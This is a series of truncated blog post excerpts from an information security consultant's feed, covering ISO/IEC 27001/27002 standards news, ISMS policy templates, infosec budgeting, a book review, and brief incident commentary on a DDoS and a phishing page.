Published 2021-05-25T14:27:57+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/IOK3dzSePMs/stepping-on-cracks.html

News on ISO/IEC 27002

ISO27001security.com pages here and there on ongoing standards activities. The most significant thing to report is that the 3rd (2013) edition of ISO/IEC 27002 appears on-track to reach final draft stage soon and will hopefully be approved this year, then published soon after (during 2022, I guess). The standard is being extensively restructured and revised, collating and addressing about 300 pages of comments from the national standards bodies at every stage. The editorial team are doing an amazing job!

The new '27002 structure will have the controls divided into 4 broad categories or types, i.e. technical, physical, people and 'organizational' [=other]. For comparison, the standard is currently structured into 13 security domains. '27002 will nearly double in size, going from 90 to 160 pages or so, thanks to new controls and additional advice including areas such as cloud and IoT security.
Virtually all of the original controls have been retained but most have been reworded for the new structure and current practice … and there's an appendix mapping the old clauses to the new. '27001 Annex A is being updated to reflect the changes, and a new version of that standard is due to be published in the 2nd quarter of 2022. I presume other standards based on '27002 (such as '

Published 2021-05-24T17:23:22+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/ywsAJY844T8/news-on-isoiec-27002.html

Pre-shocks and after-shocks

Just a brief note today: it's a lovely sunny Saturday morning down here and I have Things To Do.

I'm currently enjoying another book by one of my favourite tech authors: Yossi Sheffi's

Published 2021-04-24T09:47:20+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/TT_yFFhUTew/pre-shocks-and-after-shocks.html

KISS or optimise your ISO27k ISMS?

the ISO27k Forum, someone naively suggests that we should Keep It Simple Stupid. After all, an ISO27k ISMS is, essentially, simply a structured, systematic approach for information risk management, isn't it? At face value, then, KISS makes sense. In practice, however, factors that complicate matters for organizations designing, implementing and using their ISMSs include different:

- Business contexts - different organization sizes, structures, maturities, resources, experiences, resilience, adaptability, industries etc.;
- Types and significances of risks - different threats, vulnerabilities and impacts, different potential incidents of concern;
- Understandings of 'information', 'risk' and 'management' etc. - different goals/objectives, constraints and opportunities, even within a given organization/management team (and sometimes even within someone's head!);
- Perspectives: the bungee jumper, bungee supplier and onlookers have markedly different appreciations of the same risks;
- Ways of structuring things within the specifications of '27001, since individual managers and management teams have the latitude to approach things differently, making unique decisions based on their understandings,

Published 2021-04-23T15:58:38+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/z4BraQ4C6tI/kiss-or-optimise-your-iso27k-isms.html

Policy development process: phase 2

Today we completed and published a new "topic-specific" information security policy template on clear desk and screen.

Having previously considered information risks within the policy scope, writing the policy involved determining how to treat the risks and hence what information security or other controls are most appropriate. Here we drew on guidance from the ISO27k standards, plus other standards, advisories and good practices that we've picked up in the course of ~30 years in the field, working with a variety of industries and organizations - and that's an interesting part of the challenge of developing generic policy templates.

Different organizations - even different business units, departments, offices or teams within a given organization - can take markedly different attitudes towards clear desk and screen. The most paranoid are obsessive about it, mandating controls that would be excessive and inappropriate for most others. Conversely, some are decidedly lax, to the point that information is (to my mind) distinctly and unnecessarily vulnerable to deliberate and accidental threats.
We've picked out controls that we feel are commonplace, cost-effective and hence sensible for most organizations.

COVID19 raises another concern, namely how the risks and controls in this area vary between home offices or other non-corporate 'working from home' workplaces, compared to typical corporate offices and other workplaces. The variety of situations makes it tricky to develop a brief, general policy without delving into all the possibilities and specifics. The approach we've taken is to mention this aspect and recommend just a few key controls, hoping that workers will get the point. Customers can always customise the policy templates, for example adding explicit restrictions for particular types of information, relaxing things under certain conditions, or beefing-up the monitoring, oversight and compliance controls that accompany the policies - which is yet another complicating factor: the business context for information security policies goes beyond the written words into how they are used and mandated in practice.

Doing all of this in a way that condenses the topic to just a few pages of good practice guidance, well-written in a motivational yet generic manner, and forms a valuable part of the SecAware policy suite, explains the hours we've sunk into the research and writing. Let's hope it's a best seller!

Published 2021-04-19T14:51:35+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/SYeVfVCMw28/policy-development-phase-2.html

Policy development process: phase 1

On Sunday I blogged about preparing four new 'topic-specific' information security policy templates for SecAware. Today I'm writing about the process of preparing a policy template.

First of all, the fact that I have four titles means I already have a rough idea of what the policies are going to cover (yes, there's a phase zero).
'Capacity and performance management', for instance, is one requested by a customer - and fair enough. As I said on Sunday, this is a legitimate information risk and security issue with implications for confidentiality and integrity as well as the obvious availability of information. In my professional opinion, the issue is sufficiently significant to justify senior management's concern, engagement and consideration (at least). Formulating and drafting a policy is one way to crystallise the topic in a form that can be discussed by management, hopefully leading to decisions about what the organisation should do. It's a prompt to action.

At this phase in the drafting process, I am focused on explaining things to senior management in such a way that they understand the topic area, take an interest, think about it, and accept that it is worth determining rules in this area. The most direct way I know of gaining their understanding and interest is to describe the matter 'in business terms'. Why does 'capacity and performance management' matter to the business? What are the strategic and operational implications? More specifically, what are the associated information risks? What kinds of incident involving inadequate capacity and performance can adversely affect the organization?

Answering such questions is quite tough for generic policy templates lacking the specific business context of a given organisation or industry, so we encourage customers to customise the policy materials to suit their situations.
For instance:

- An IT/cloud service company would probably emphasise the need to maintain adequate IT capacity and performance for its clients and for its own business operations, elaborating on the associated IT/cyber risks.
- A healthcare company could mention health-related risk examples where delays in furnishing critical information to the workers who need it could jeopardise treatments and critical care.
- A small business might point out the risks to availability of its key workers, and the business implications of losing its people (and their invaluable knowledge and experience, i.e. information assets) due to illness/disease, resignation or retirement. COVID is a very topical illustration.
- An accountancy or law firm could focus on avoiding issues caused by late or incomplete information - perhaps even discussing the delicate balance between those two aspects (e.g. there a

Published 2021-04-13T11:17:11+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/Jut-vvWbIKA/policy-development-process-phase-1.html

Infosec policy development

We're currently preparing some new information risk and security policies for SecAware.com. It's hard to find gaps in the suite of 81 policy templates already on sale (!) but we're working on these four additions:

- Capacity and performance management: usually, an organization's capacity for information processing is managed by specialists in IT and HR. They help general management optimise and stay on top of information processing performance too. If capacity is insufficient and/or performance drops, that obviously affects the availability of information ... but it can harm the quality/integrity and may lead to changes that compromise confidentiality, making this an information security issue.
The controls in this policy will include engineering, performance monitoring, analysis/projection and flexibility, with the aim of increasing the organisation's resilience. It's not quite as simple as 'moving to the cloud', although that may be part of the approach.
- Information transfer: disclosing/sharing information with, and obtaining information from, third party organisations and individuals is so commonplace, so routine, that we rarely even think about it. This policy will outline the associated information risks, mitigating controls and other relevant approaches.
- Vulnerability disclosure: what should the organisation do if someone notifies it of vulnerabilities or other issues in its information systems, websites, apps and processes? Should there be mechanisms in place to facilitate, even encourage notification? How should issues be addressed? How does this relate to penetration testing, incident management and assurance? Lots of questions to get our teeth into!
- Clear desks and screens: this is such a basic, self-evident information security issue that it hardly seems worth formulating a policy. However, in the absence of policy and with no 'official' guidance, some workers may not appreciate the issue or may be too lazy/careless to do the right thing. These days, with so many people working from home, the management oversight and peer pressure typical in corporate office settings are weak or non-existent, so maybe it is worth strengthening the controls by reminding workers to tidy up their workplaces and log off. It's banal, not hard!
The next release of ISO/IEC 27002 will call these "topic-specific information security policies" focusing on particular issues and/or groups of people in some detail, whereas the organisation's "information security policy" is an overarching, general,

Published 2021-04-11T14:52:31+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/947ehLndxmU/infosec-policy-development.html

NBlog Mar 11 - book review on "Cyber Strategy"

Cyber Strategy: Risk-driven Security and Resiliency
Authors: Carol A. Siegel and Mark Sweeney
Publisher: Auerbach/CRC Press
ISBN: 978-0-367-45817-1
Price: ~US$100 + shipping from Amazon

Outline

This book lays out a systematic process for developing corporate strategy in the area of cyber (meaning IT) security and resilience.

Pros

- An in-depth exposition on an extremely important topic
- It emphasises risks to the business, to its information, and to its IT systems and networks, in that order
- Systematic, well structured and well written, making it readable despite the fairly intense subject matter
- Lots of diagrams, example reports and checklists to help put the ideas into action
- Treating strategy development as a discrete project is an intriguing approach

Cons

- Describes a fairly laborious, costly and inflexible approach, if taken literally and followed STEP-by-STEP
- Implies a large corporate setting, with entire departments of professionals specializing and willing to perform or help out in various areas
- A little dogmatic: alternative approaches are not only possible but sufficient, appropriate or even better under various circumstances, but strategic options and choices are seldom mentioned
- As described, the strategy planning horizon is very short
- An entirely defensive risk-averse strategic approach is implied

Published 2021-03-11T12:10:12+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/KgwKZpva4ho/nblog-mar-11-book-review-on-cyber.html
Y2k + 20: risk, COVID and "the Internet issue"

It feels like 'just the other day' to me but do you recall "Y2k" and all that? Some of you reading this weren't even born back then, so here's a brief, biased and somewhat cynical recap.

For a long time prior to the year 2000, a significant number of software programmers had taken the same shortcut we all did back in "the 90s". Year values were often coded with just two decimal digits: 97, 98, 99 ... then 00, "coming ready or not!". "Oh Oh" you could say. "OOps".

When year counters went around the clock and reset to zero, simplistic arithmetic operations (such as calculating when something last happened, or should next occur) would fail causing ... well, potentially causing issues, in some cases far more significant than others.

Failing coke can dispensers and the appropriately-named Hornby Dublo train sets we could have coped with but, trust me, you wouldn't want your heart pacemaker, new fangled fly-by-wire plane or the global air traffic control system to decide that it had to pack up instantly because it was nearly 100 years past its certified safe lifetime. Power grids, water and sewerage systems, transportation signalling, all manner of communications, financial, commercial and governmental services could all have fallen in a heap if the Y2k problems weren't resolved in time, and this was one IT project with a hard, immutable deadline, at a time when IT project slippage was expected, almost obligatory. Tongue-in-cheek suggestions that we might shimmy smoothly into January 1st [19]9A were geekly-amusing but totally impracticable. In risk terms, the probability of Y2k incidents approached 100% certain and the personal or societal impacts could have been catastrophic under various credible scenarios - if (again) the Y2k monster wasn't slain before the new year's fireworks went off ...
and, yes, those fancy public fireworks display automated ignition systems had Y2k failure modes too, along with the fire and emergency dispatch systems and vehicles.

The combination of very high probability and catastrophic impact results in a risk up at the high end of a tall scale. So, egged-on by information security pro's and IT auditors (me, for instance), management took the risk seriously and invested significant resources into solving "the Y2k issue". Did you spot the subtle shift from "Y2k" to "the Y2k issue"? I'll circle back to that in just a moment.

Individual Y2k programming updates were relatively straightforward on the whole (with some interesting exceptions, mostly due to prehistoric IT systems still in use well past their best-before dates, with insurmounta

Published 2021-01-10T10:34:21+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/0xVDEQAmq2s/y2k-20-risk-covid-and-internet-issue.html

NBlog Nov 15 - the trouble with dropping controls

I literally don't understand a question that came up on the ISO27k Forum this week. A member asked:

'Should a control be discontinued because a reassessment showed a lower acceptable risk score?'

I find it interesting to pick apart the question to explore the reasons why I don't understand it, and the implications. See what you think ...

Any control may legitimately be 'discontinued' (removed, unimplemented, retired, replaced, modified etc.) provided that change has been duly thought-through, assessed, justified, and deemed appropriate for whatever reasons. It may be important, though, to be reasonably certain that discontinuation is, in fact, in the best interests of the organization, and that's often hard to determine as controls can be quite complex in themselves, and are part of a highly complex 'control environment'.
A seemingly trivial, unimportant, even redundant control (such as an alert) might turn out to be critical under specific circumstances (where other alerts fail, or were accidentally disabled, or were actively and deliberately bypassed by an attacker or fraudster). So, it may be preferable to 'suspend' the control for a while, pending a review to determine what the effects truly are … since it is probably easier and quicker to reinstate a 'suspended' control if needs be, than it would have been if the control was completely removed and trashed. A dubious firewall rule, for example, might be set to 'warn and log only', rather than simply being dropped from the ruleset, the reverse o

Published 2020-11-15T10:43:57+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/mcMU_bOc4UI/nblog-nov-15-trouble-with-dropping.html

NBlog Oct 8 - is Facebook an asset?

Yet another good question came up on the ISO27k Forum today*. Someone asked whether to add the company's Facebook page to their information asset register (implying that it would need to be risk-assessed and secured using the Information Security Management System processes), or whether the asset should be the Facebook account (ID and password, I guess)**.

From the marketing/corporate perspective, good customer relations are perhaps the most valuable information assets of all, along with other external relations (e.g. your suppliers, partners, prospective and former customers, regulators/authorities and owners) and internal relations (the workforce, including staff, management, contractors, consultants and temps, plus former and prospective workers). It's tempting to think of these as just categories or faceless corporations, but in reality the interactions are between individual human beings, so social relations in general are extremely important in business.
There are numerous mechanisms that generate, support and maintain good customer relations, Facebook for example. Likewise for other relations (e.g. ISO27k Forum!). You might think of them as simply apps or information services, often cloud based, often commercial services provided by third parties hence limiting what is on offer and your options or influence over the infosec, privacy and other requirements.

There are also related processes and activities, some of which have infosec, privacy and other implications e.g. I have a bank pestering me right now for identification info which they need from me as part of the anti money laundering regs: it's a pain for me and for them, but they have to comply with the laws and regs.

Workforce relationship management and 'industrial relations' is a huge part of 'management', with governance, compliance and other implications and risks.

Overall, relationship management is, clearly, an important part of business success, or indeed failure when things go horribly wrong (e.g. look up the Ratners jewelers fiasco in the UK, and just look around at the difficulties arising from COVID-19: our people and myriad relationships are under extreme stress this year, not just our organisations).

Summing up, I encourage everyone to think big in terms of the scope of information assets, with a strong emphasis on the information that matters most to the business, the organization, and its strategic objectives.
The IT systems and services are merely business tools: what matters most is the business information generated/processed by them.

* As I've said before, it's funny how often a simple, seemingly basic or naive question on ISO27k Forum leads to something more revealing when the answers and debate sta

Published 2020-10-08T05:41:06+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/yi7jHwNMpPE/nblog-oct-8-is-facebook-asset.html

NBlog Sept 27 - 2021 infosec budget

Are you responsible for your organisation's information security or cybersecurity budget? Are you busily putting the finishing touches to your 2021 budget request, still working on it, just thinking about it, or planning to do it, honestly, when you next come up for breath?

Budgeting is generally a dreaded, stressful management task. Not only do we have to figure out the figures but we typically anticipate a tough battle ahead leading (probably) to a disappointing outcome and yet more problems.

On top of that, 2020 has been an exceptional year thanks to COVID. The business and information security implications of knowledge workers suddenly working from home, en masse, are still playing out now, while the economic impacts of COVID do not bode well for any of next year's budgets except perhaps for the manufacture of vaccines, masks, gloves, sanitiser and respirators.

A substantial part of information security expenditure is (whatever we may believe as professionals) discretionary. The decision to go for ISO/IEC 27001 certification, for instance, flows largely from management's appreciation of the business value of investing in information risk and security management good practices.
There may be specific drivers such as incidents, compliance pressures or demands from business owners, partners and prospective customers, but even then there are numerous options and factors to consider such as:

- The objectives for the Information Security Management System - what it is expected to achieve;
- How broadly or narrowly to scope the ISMS;
- At what pace to implement the standard, and how precisely;
- What resources to assign to the implementation, not least a suitable implementation project manager/consultant and project team;
- Priorities for this work relative to other business activities, objectives and requirements, making adjustments as necessary (both initially and as the project proceeds when stuff comes up - as COVID did, for instance);
- Alignment with other corporate projects and initiatives e.g. exploiting strategic opportunities to update various systems, policies and processes for security and other reasons, at the same time;
- Change management aspects: does the organisation have the capacity and appetite first to adopt and assimilate the ISMS, and secondly to get the most out of it;
- Project risks e.g. the possibility that things probably w

Published 2020-09-27T17:59:17+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/ZKVsWHrDvlg/nblog-sept-27-2021-infosec-budget.html

NBlog Sept 24 - status of ISO27001 Annex A

One of the recurrent (zombie) threads on the ISO27k Forum concerns the status of ISO/IEC 27001:2013 Annex A.
Typically the zombie is prodded from its slumber by a relatively inexperienced member naively suggesting that certain security controls from Annex A are essential, implying that they are mandatory for certification.

In the course of debating and attempting to bury the zombie, some members trot out their own curious interpretations of the standard, pointing out actual and apparent discrepancies in the wording which, to them, indicate that Annex A is at least partly mandatory. I'm too polite to say they are wrong, but I believe they are misguided or mistaken - partly, it must be admitted, because the standard is ambiguously worded in some areas, hence it has to be interpreted carefully in practice. To be clear, based on my three decades' professional experience and membership of ISO/IEC JTC 1/SC 27, my position is that none of the controls outlined in Annex A are mandatory. None at all. Zero.

This is a fundamental but complex issue to explain, so please forgive this lengthy post. In the hope of decapitating the zombie, once and for all, I feel the urge to explain in detail. To kick off, I'll emphasise the critical distinction between two key terms: Mandatory

2020-09-24T11:12:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/ziV7PblL41g/nblog-sept-24-status-of-iso27001-annex-a.html

NBlog Sept 4 - standardising ISMS data interfaces

We've been chatting on the ISO27k Forum lately about using various IT systems to support ISO27k ISMSs.
This morning, in response to someone saying that a particular tool which had been recommended did not work for them, Simon Day made the point that "Each organisation trying to implement an ISMS will find its own way based on their requirements."

Having surveyed the market for ISMS products recently, I followed up with my usual blurb about organisations having different information risks and business situations, hence their requirements in this area are bound to differ, and in fact vary dynamically (in part because organisations mature as they gain experience with their ISMS: their needs change). The need for flexibility is why the ISO27k standards are so vague (essentially: figure out your own requirements by identifying and evaluating your information risks using the defined governance structure - the ISMS itself), rather than explicitly demanding particular security controls (as happens with PCI-DSS). ISO27k is designed to apply to any organisation.

That thought sparked a creative idea that I've been contemplating ever since: wouldn't it be wonderful if there was a standard for the data formats allowing us to migrate easily between IT systems supporting ISO27k ISMSs?

I'm idly thinking about a standard file format with which to specify information risks (threats, vulnerabilities, impacts and probabilities), controls, policies, procedures, metrics, objectives etc. - maybe an XML schema with specified field names and (where applicable) enumerated lists of values.

Aside from migrating between ISMS IT support systems and services, standard data formats would facilitate data sharing between application systems, services or sub-functions (e.g. for vulnerability management, incident management and information risk management), and between departments or even organisations (e.g. insurance companies, auditors and advisors and their clients and partners).

Perhaps we should develop an outline specification and propose such a standard to ISO/IEC JTC1 SC 27.
A New W

2020-09-04T14:26:51+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/SUEgRfvSeI0/nblog-sept-4-standardising-isms-data.html

NBlog July 15 - ISO27k ISMS products

Having drafted a generic requirement specification for systems supporting an ISO27k ISMS, I'm slowly trawling the Web for products in the hope of finding apps, templates and services that we would be willing to use ourselves and recommend to our consulting clients.

So far I've found about 20 commercial or open-source ISMS systems plus maybe twice that number of risk management systems, plus quite a variety of more focused systems supporting incident management, business continuity, vulnerability management, patch management etc. It's a confusing, sprawling and dynamic market … so I'm also working on a structured evaluation process that will help us pick out gems from the stones on offer, depending on our own and our clients' specific needs.

Along the way, I've picked up murmurings of discontent from customers saddled with low-quality content supplied with some ISO27k ISMS systems and toolkits. Aside from variation between the products, could it be, I wonder, that some of the products currently on offer are inadequate because customers vary so much in size, complexity, maturity etc., having different expectations or requirements? Could this be a side-effect of ISO27k's intended application to all organizations, resulting in it being jack-of-all-trades and master-of-none? We could develop generic content specifically targeting particular market segments or types of organisation ... but instead we've started with the basics that every ISO27k ISMS needs with the intention of offering optional add-ons, giving customers more choice.
One of those options is to develop custom materials and support individual customers to implement and optimise their ISMSs using appropriate systems/tools, provided we can convince management of the value of our consultancy services - and that's a tough sell, especially during COVID-19. Doing it all in-house may be a viable option if the organisation has the people with the requisite skills, competencies, knowledge and experience. That seems unlikely if there is no ISMS already in place - catch-22. There's also the matter of the time needed for people to learn the ropes and get up to speed with the ISMS, given all the other things on the go: the longer things drift along, the more the organisation remains subject to information risks that may not be managed effectively.

I'm working on other options too. More info to follow. Watch this space.

2020-09-04T14:22:25+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/ZSY5gwkKehU/nblog-july-15-iso27k-isms-products.html

NBlog Sept 3 - ISO27001 rocket fuel

We're on a mission to convince every organisation that managing information risks properly is more than just a compliance imperative. It's good for business.

Is your organisation looking to raise its security game? Are managers worried about ransomware, privacy breaches and intellectual property theft, especially now with so many of us working from home? What about the business continuity risks as supply chains are stressed to breaking point by COVID-19? Are your suppliers cutting corners on privacy and security, hoping nobody will notice? Are desperate competitors taking advantage of the disruption to undermine your cyber-defences?

Worse still, is management blissfully unaware of the issues, with everyone heads-down, rowing hard, too busy to notice the icebergs dead ahead?...
Or is there a strong drive to secure and exploit information as an integral part of operations? Does being trusted by customers and stakeholders equate to brand value, new and repeat business, opening up strategic opportunities?

This is a great opportunity to take the first step on your mission!

We have developed a modular approach based on ISO/IEC 27001. An Information Security Management System facilitates the management of information risks, information security controls, governance and assurance arrangements and so forth, 'systematically' i.e. in a structured and coherent way.

Despite being standards, ISO27k acknowledges that each organisation needs to adapt the ISMS according to the business situation and the associated information risks. Within the same general governance structure, the specific requirements vary markedly between organisations and industries. With that in mind, we've developed a suite of materials covering the mandatory requirements for every ISMS, plus add-ons for the discretionary parts. In truth, all of them - even the mandatory ones - are templates, designed to be customised ... and we can even help you with that if you like!

Through SecAware.com, we offer several packages:

ISMS Launchpad is a minimalist set of templates for the mandatory

2020-09-03T16:03:50+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/_UnpZquht2M/nblog-sept-3-iso27001-rocket-fuel.html

NBlog Aug 28 - NZ Stock Exchange DDoS continues

The New Zealand Stock Exchange is having a rough week. Under assault from a sustained DDoS attack, its web servers have crumpled and fallen in an untidy heap again today, the fourth day of embarrassing and costly disruption.

DDoS attacks are generally not sophisticated hacks but crude overloads caused by sending vast volumes of data to overwhelm the servers.
The Host Error message above shows "RedShield" which appears to be a security service remarkably similar to a Web Application Firewall (although the company claims to be producing something far better) ...

If so, RedShield appears to be passing DDoS traffic to the stock exchange web servers which can't cope. Presumably, this particular DDoS attack does not fit the profile of the attacks that RedShield is designed to block, in other words RedShield is patently not preventing the DDoS.

I don't know whether RedShield is supposed to block DDoS traffic and is failing to do so, or if DDoS protection is simply not part of the RedShield service. Either way, it appears a DDoS attack is causing business impacts.

2020-08-28T15:19:43+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/DRgby8YTNjc/nblog-aug-28-nz-stock-exchange-ddos.html

NBlog Aug 27 - creative teamwork post-lockdown

A couple of days ago I blogged about MURAL, just one of many creative tools supporting collaborative working. If you missed it, please catch up and contemplate how you might use tools such as that right now for teamworking during the COVID19 lockdowns.

Today I've been thinking about 'the new normal' as the world emerges from the pandemic, inspired by the intersection of two threads.

Firstly, thanks to a Zoom session with participants and presenters from Queensland, I've been reading up on "industry 4.0". I'm not totally au fait with it yet but as I see it the key distinguishing features are:

- Ever-increasing automation of manufacturing, with smart devices and robotics supplementing the capabilities of both manual and knowledge workers;
- Industrial IoT, coupling sensors and actuators on the production line with each other, allowing workers to interact with the machinery through screens and keyboards etc. and a growing layer of automation smarts and networking;
- Ever-increasing reliance on IT, data, analytics, systems and artificial intelligence (with implications for risk, resilience, reliability and security);
- New capabilities, particularly in the specification and design areas - such as virtual reality simulations and rapid prototyping of jigs, machines and products by "additive manufacturing" (industrial 3D printers);
- An increasing focus on adding value through knowledge work in research and development plus product service/support, de-emphasising the manufacturing production core activities (which, I guess, started with the off-shoring of manufacturing to low-wage economies, and is now leading to both on- and off-shore automated manufacturing);
- Rapid innovation and change, leading to difficulties in strategic corporate planning (with credible planning horizons falling to just a couple of years!) and personal career planning (e.g. how can workers learn to use tools and techniques that either aren't refined enough to be taught, perhaps not even invented yet?);
- Shortages of people with the requisite skills, knowledge and adaptability, able to thrive despite the challenges and seize opportunities as they arise.

2020-08-27T18:50:44+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/aNv7pK12tsE/nblog-aug-27-creative-teamwork-post.html

NBlog Aug 23 - ISMS comms plan

Yesterday I started preparing an ISMS communications plan to satisfy ISO/IEC 27001:2013 clause 7.4, with a little help from the Web.

Naturally I started out with the standard itself. Clause 7.4 doesn't literally demand that organisations must have a "communications plan" as such, otherwise it would have been one of the mandatory documents included in SecAware ISMS Launchpad.
Oh no, it's more circumspect: the standard says "the organization shall determine the need for internal and external communications relevant to the information security management system" ... and proceeds to outline - yes, you guessed it - a "communications plan".

ISO/IEC 27003:2017 confirms our assessment by stating explicitly: "Documented information on this activity and its outcome is mandatory only in the form and to the extent the organization determines as necessary for the effectiveness of its management system". In other words, a documented comms plan is discretionary - advised as good practice but not strictly demanded of every organisation for '27001 compliance certification.

Well anyway, let's do it! To comply with the standard, what should typically be communicated in respect of the ISMS, when, to and by whom, and by what means?

ISO/IEC 27003 offers examples of the things that should be communicated:

- Information security policies and procedures, plus changes thereto;
- [The organisation's] Information [risk and] security objectives;
- Knowledge on information security risks;
- Requirement

2020-08-26T12:41:58+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/CK4anVr3ZIo/nblog-aug-23-isms-comms-plan.html

NBlog Aug 26 - ISMS templates

SecAware ISMS Launchpad:

That succinct one-pager addresses two requirements from the standard:

- Clause 9.2 (c) says (in part) "The organisation shall plan, establish, implement and maintain an audit programme(s)" - an explicit documentation requirement that the certification auditors will definitely check for compliance;
- Clause 9.3 says (in part) "Top management shall review the organization's information security management system at planned intervals to ensure its continuing suitability, adequacy and effectiveness." - an implicit documentation requirement that the certification auditors will probably check for compliance, and although the standard doesn't literally demand it, they may well insist on seeing written evidence that management reviews have been planned.

Those clauses lay out fairly succinctly what it means to internally audit or management review the ISMS: I have interpreted the requirements in terms of activities that might be performed quarterly over two years as shown on the schedule, with brief descriptions about the approaches to be taken ... but, as with all the SecAware materials, they are merely generic suggestions that customers are encouraged to adapt. Large, mature organisations with Internal Audit functions, for instance, may well engage them to plan and perform the ISMS internal audits using their conventional audit approach and whatever associated documentation they normally produce. They may prefer to audit the ISMS just once during the three-year certification cycle, or conversely they may want to focus on a series of specific areas of risk and concern over successive audits, perhaps integrating the ISMS audit work with other IT, risk, cybersecurity or complian

2020-08-26T12:38:57+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/DlNe_O4AFDg/nblog-aug-26-isms-templates.html

NBlog Aug 20 - creative teamwork in lockdown

MURAL today.

MURAL is a 'digital workspace for visual collaboration' by virtual teams. The animated demonstration on their home page caught my beady eye. Here's a static snapshot as a small group of people are busy placing/moving blobs on a graphic, presumably while discussing what they are doing on a parallel channel (e.g. Zoom):

2020-08-21T05:23:45+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/TkxYG4SEY68/nblog-aug-20-creative-teamwork-in.html

NBlog Aug 19 - IAAC Directors' Guides

Some time back I bumped into a handy management guide on information risk - a double-sided leaflet from the Information Assurance Advisory Council. In 2015, it inspired a security awareness briefing explaining that colourful process diagram, which has now morphed into a further 5-page briefing on Information Risk Management, soon to join the SecAware ISMS templates.

Googling for the IAAC guide led me to a cluster of FREE Directors' Guides from the IAAC offering useful, relevant guidance for senior management:

- Why Information Risk is a Board Level Issue - is a backgrounder including this apt and succinct explanation: "Information Risk encompasses all the challenges that result from an organisation's need to control and protect its information."
- Governance and Structures - describes directors' governance responsibilities relating to information risk: "Directors need to put in place the arrangements and processes by which responsibilities are distributed and significant information risk decisions are to be made and reviewed."
- Information Risk Management Approach - encourages directors to support the remainder of the organisation in fulfilling their responsibilities for information risk, ensuring strategic alignment between risk management and business objectives.
- Realising the Benefits - outlines the business benefits of good information risk management in terms of: efficiency; agility; manageability; exploitation of new opportunities (more confidently expanding into new areas of business); customer retention; brand strengthening; cost-efficient compliance; and dealing efficiently with incidents. "Good information risk mitigation supports organisational strategies and tactical agil

2020-08-19T19:48:48+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Fb9FiI1qHp0/nblog-aug-19-iaac-directors-guides.html

NBlog Aug 13 - Google customers phishing

I have lightly redacted the URL, but those action buttons are clearly not pointing to an IsecT domain. Firebase Storage is a Google cloud storage/app service:

Google promotes Firebase security in terms of high availability and authentication for their customers i.e. web developers using Firebase to host content on the web. No mention of security for their customers' victims though, and although Google can't be held entirely responsible for its customers' nefarious activities, I presume (hope!) they have the processes in place to identify and respond efficiently to incidents of this nature.

I've reported this incident through a Firebase customer support channel as there is no obvious way for us to report misuse of their services by phishers etc.

I'll let you know how they respond.

2020-08-13T06:05:41+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/zqXoR2wChAo/nblog-aug-13-google-customers-phishing.html

NBlog Aug 8 - musing on ISO/IEC 27014 & infosec governance

This morning I've been studying the final draft of the forthcoming second edition of ISO/IEC 27014 "Governance of information security", partly to update ISO27001security.com but mostly out of my fascination with the topic.

Section 8.2.5 of the standard specifies the governance objective to "Foster a security-positive culture":

"Governance of information security should be built upon entity culture, including the evolving needs of all the interested parties, since human behaviour is one of the fundamental elements to support the appropriate level of information security.
If not adequately coordinated, the objectives, roles, responsibilities and resources can conflict with each other, resulting in the failure to meet any objectives. Therefore, harmonisation and concerted orientation between the various interested parties is very important. To establish a positive information security culture, top management should require, promote and support coordination of interested party activities to achieve a coherent direction for information security. This will support the delivery of security education, training and awareness programs. Information security responsibilities should be integrated into the roles of staff and other parties, and they should support the success of each ISMS by taking on these responsibilities."

Not bad, although personally I would have mentioned senior management setting 'the tone at the top', in other words influencing the entire corporate culture through their leadership, decisions, direction and control, particularly in the way they behave.

For example, even though management may formally insist upon ethical behaviour as a policy matter, if managers in fact act unethically, push the boundaries of ethicality through their decisions and priorities, or simply tolerate (turn a blind eye to, fail to address) unethical/dubious activities, that can severely erode if not destroy the value of the policy. Workers observant enough to spot the disconnect between theory and practice are, in effect, enabled or even encouraged to decide for themselves whether to comply with the policy.
In a disciplinary situation, management's failure to enforce compliance with

2020-08-10T11:44:49+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/vcwOkXVtKNk/nblog-aug-8-musing-on-isoiec-27014.html

NBlog Aug 7 - what is operational resilience

Seeing the term 'operational resilience' being bandied about right now, I thought I'd take a closer look, starting with the definitions.

So what is 'operational resilience'? It is:

- "a set of techniques that allow people, processes and informational systems to adapt to changing patterns. It is the ability to alter operations in the face of changing business conditions. Operationally resilient enterprises have the organizational competencies to ramp up or slow down operations in a way that provides a competitive edge and enables quick and local process modification." says Gartner.
- "both a process and a characteristic of an organization to adapt rapidly to changing environments and needs. It is an organizational trait that allows it to carry out its mission or business despite the presence of operational stress and disruption. In other words, it is the organization's ability to handle and control external factors that may hinder it from functioning." says Techopedia.
- "financial resilience" says Accenture (begging the question: What is financial resilience?).
- "the ability of firms and the financial sector as a whole to prevent, adapt, respond to, recover, and learn from operational disruptions" says the Bank of England.
- "the ability of an organisation to adapt rapidly to changing environments. This includes both the resilience of systems and processes and more generally the ability of the organisation to continue to operate its business in the event of disruptive events." says KPMG.
- ... and so on.

Some commentators focus on specific aspects that interest or concern them - financial stability for example, and systemic failure of highly integrated and interdependent industries.

2020-08-10T11:41:46+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/WSPPsx9w-6E/nblog-7-aug-what-is-operational.html

NBlog July 23 - infosec roles & responsibilities

